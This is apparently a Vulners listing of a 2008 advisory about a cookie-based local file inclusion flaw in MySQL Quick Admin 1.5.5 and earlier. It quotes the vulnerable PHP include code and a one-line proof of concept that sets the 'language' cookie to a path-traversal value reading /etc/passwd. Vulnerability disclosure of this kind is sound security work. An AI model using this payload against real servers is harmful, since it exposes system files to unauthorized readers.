MySQL Quick Admin <= 1.5.5 (COOKIE) Local File Inclusion Vulnerability

🗓️ 02 Oct 2008 00:00:00Reported by RootType

MySQL Quick Admin vulnerability - Local File Inclusio


                                                # MySQL Quick Admin &lt;= 1.5.5 (COOKIE) Local File Inclusion Vulnerability
# url: http://www.mysqlquickadmin.com/
#
# Author: JosS
# mail: sys-project[at]hotmail[dot]com
# site: http://spanish-hackers.com
# team: Spanish Hackers Team - [SHT]
#
# This was written for educational purpose. Use it at your own risk.
# Author will be not responsible for any damage.
#
# Greetz To: Pepelux :)
#
# *Requirements: magic_quotes_gpc = Off

vuln file: /includes/required.php
vuln code: 

if(!empty($_COOKIE['language']) &amp;&amp; !isset($_SESSION['language'])){
	$_SESSION['language'] = $_COOKIE['language'];
}

....

if(LANG == &quot;&quot;){
	if(!isset($_SESSION['language'])){
		include(&quot;lang/english/lang.php&quot;);
		$_LANG = &quot;english&quot;;
	} else {
		include(&quot;lang/&quot;.$_SESSION['language'].&quot;/lang.php&quot;);
		$_LANG = $_SESSION['language'];
	}

... }

LFI (poc): 
1) javascript:document.cookie=&quot;language=../../../../../../../../../../etc/passwd%00; path=/&quot;;
2) and enters /index.php

Ingenious work :D

02 Oct 2008 00:00Current

7.1High risk

Vulners AI Score7.1

MySQL Quick Admin &lt;= 1.5.5 (COOKIE) Local File Inclusion Vulnerability

MySQL Quick Admin <= 1.5.5 (COOKIE) Local File Inclusion Vulnerability